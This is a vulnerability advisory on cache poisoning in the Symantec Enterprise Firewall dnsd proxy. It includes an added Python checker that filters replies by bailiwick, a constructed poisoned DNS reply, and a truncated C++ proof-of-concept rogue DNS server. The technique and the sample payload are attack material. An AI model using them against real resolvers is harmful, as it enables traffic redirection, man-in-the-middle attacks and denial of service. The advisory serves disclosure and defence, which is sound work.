Symantec Enterprise Firewall, designed to provide proactive, enterprise-class network and application-level protection, enables fast and secure connectivity with the Internet.
Symantec Enterprise Firewall dnsd proxy is vulnerable to cache poisoning attacks by an attacker acting as a caching nameserver.
Credit:
The information has been provided by fryxar.
It is possible to inject false entries into the server's cache and make a false DNS server appear authoritative for a zone it does not control. Once this information is loaded into the cache, any request for a subdomain of that zone is sent to the false DNS server. To achieve this, a malicious DNS server responds to a query (not necessarily with an answer) and fills the authority and additional record sections of the DNS response with information that need not relate to the answer at all. The SEF dnsd proxy accepts this response without performing the checks needed to ensure that this information is correct or even related in some way to the answer (i.e., that the responding server has appropriate authority over those records).
fryxar has found that some public DNS servers use this behaviour to redirect unregistered domains to their own sites. It could also be used for Man-in-the-Middle, Denial of Service and Social Engineering attacks.
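The check the advisory says dnsd omits, as an added example that is not part of the advisory or of Symantec's code: a minimal resolver-side parser that accepts records from a reply only when their owner names fall within the zone the queried server is trusted for (its bailiwick). The sample message, names and addresses are constructed placeholders in the shape of the scenario described above.

```python
import struct

def enc_name(name):  # wire-encode a dotted name, no compression (used to build the sample)
    return b"".join(bytes([len(l)]) + l.encode() for l in name.strip(".").split(".") if l) + b"\x00"
def rr(name, rtype, rdata, ttl=3600):  # one class-IN resource record
    return enc_name(name) + struct.pack("!HHIH", rtype, 1, ttl, len(rdata)) + rdata

def read_name(msg, off, end=None):
    """Decode the name at msg[off:], following compression pointers; return (name, next offset)."""
    labels = []
    while True:
        ln = msg[off]
        if (ln & 0xC0) == 0xC0:                      # compression pointer (RFC 1035 4.1.4)
            end = off + 2 if end is None else end
            off = struct.unpack("!H", msg[off:off + 2])[0] & 0x3FFF
        elif ln == 0:
            return ".".join(labels), (off + 1 if end is None else end)
        else:
            labels.append(msg[off + 1:off + 1 + ln].decode("ascii").lower())
            off += 1 + ln

def parse_section(msg, off, count):  # parse `count` RRs -> ([(owner, type, rdata)], next offset)
    rrs = []
    for _ in range(count):
        name, off = read_name(msg, off)
        rtype, _, _, rdlen = struct.unpack("!HHIH", msg[off:off + 10])
        rrs.append((name, rtype, msg[off + 10:off + 10 + rdlen]))
        off += 10 + rdlen
    return rrs, off

def in_bailiwick(name, zone):  # owner name is the trusted zone itself or a subdomain of it
    return name == zone or name.endswith("." + zone)
def filter_response(msg, bailiwick):
    """Split a reply into (cacheable, rejected): an RR is cached only if its owner is in the bailiwick."""
    _, _, qd, an, ns, ar = struct.unpack("!HHHHHH", msg[:12])
    off = 12
    for _ in range(qd):                              # skip the question section
        off = read_name(msg, off)[1] + 4
    rrs, _ = parse_section(msg, off, an + ns + ar)
    zone = bailiwick.lower().strip(".")
    keep = [r for r in rrs if in_bailiwick(r[0], zone)]
    drop = [r for r in rrs if not in_bailiwick(r[0], zone)]
    return keep, drop

# Constructed sample shaped like the advisory's scenario: a reply from the fryxar.afraid.org
# server whose authority/additional sections claim that fakedns.com serves all of "org".
POISONED = (struct.pack("!HHHHHH", 0x1234, 0x8400, 1, 1, 1, 1)                 # header, QR+AA
            + enc_name("www.fryxar.afraid.org") + struct.pack("!HH", 1, 1)      # question: A
            + rr("www.fryxar.afraid.org", 1, bytes([192, 0, 2, 10]))            # answer, in zone
            + rr("org", 2, enc_name("fakedns.com"))                              # authority: org NS
            + rr("fakedns.com", 1, bytes([192, 0, 2, 99])))                      # additional glue
```

Running `filter_response(POISONED, "fryxar.afraid.org")` keeps only the in-zone answer and rejects both the "org NS" record and its glue, which is exactly what a resolver without the check would have cached.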
Vendor Status:
Symantec's response is as follows:
"Symantec engineers are reviewing the posted information. If it is validated we will respond accordingly."
Proof of Concept Code:
Solaris 9 / SEF 8 and SEF 7.0.4: On an authoritative nameserver (e.g. afraid.org dynamic DNS, which supports domain NS delegation), compile and run the following small DNS server:
// PoC poisoning cache attack SEF 8 and later (by fryxar)
// Requires poslib 1.0.4 library
// Compile: g++ `poslib-config --libs --cflags --server` poc.cpp -o poc

// (The published listing begins inside main()'s try block; the includes,
//  the listening address `a` and the opening of the try block are not reproduced.)
        /* bring up posadis */
        servers.push_front(ServerSocket(ss_udp, udpcreateserver(&a)));
        // use the posadis logging system
        pos_log(context_none, log_info, "Proof of concept DNS server starting up...");
        // set signal handlers
        signal(SIGINT, cleanup);
        signal(SIGTERM, cleanup);
        // set query function
        handle_query = my_handle_query;
        // run server
        posserver_run();
    } catch (PException p) {
        printf("Fatal exception: %s\n", p.message);
        return 1;
    }
    return 0;
}

/* the entry function which will handle all queries */
DnsMessage *my_handle_query(pending_query *query) {
    DnsMessage *a = new DnsMessage();
    DnsQuestion q;
    DnsRR rr;
    /* set a as an answer to the query */
    a->ID = query->message->ID;
    a->RD = query->message->RD;
    a->RA = false;
    if (query->message->questions.begin() == query->message->questions.end()) {
        /* query did not contain question */
        a->RCODE = RCODE_QUERYERR;
        return a;
    }
    q = *query->message->questions.begin();
    a->questions.push_back(q);
    a->QR = true;
    // (The remainder of the handler is not reproduced in the published listing.)
SEF now "thinks" that the fakedns.com server is an authoritative nameserver for the ".org" domain, a belief planted by the fryxar.afraid.org DNS server, which is authoritative only for the fryxar.afraid.org domain.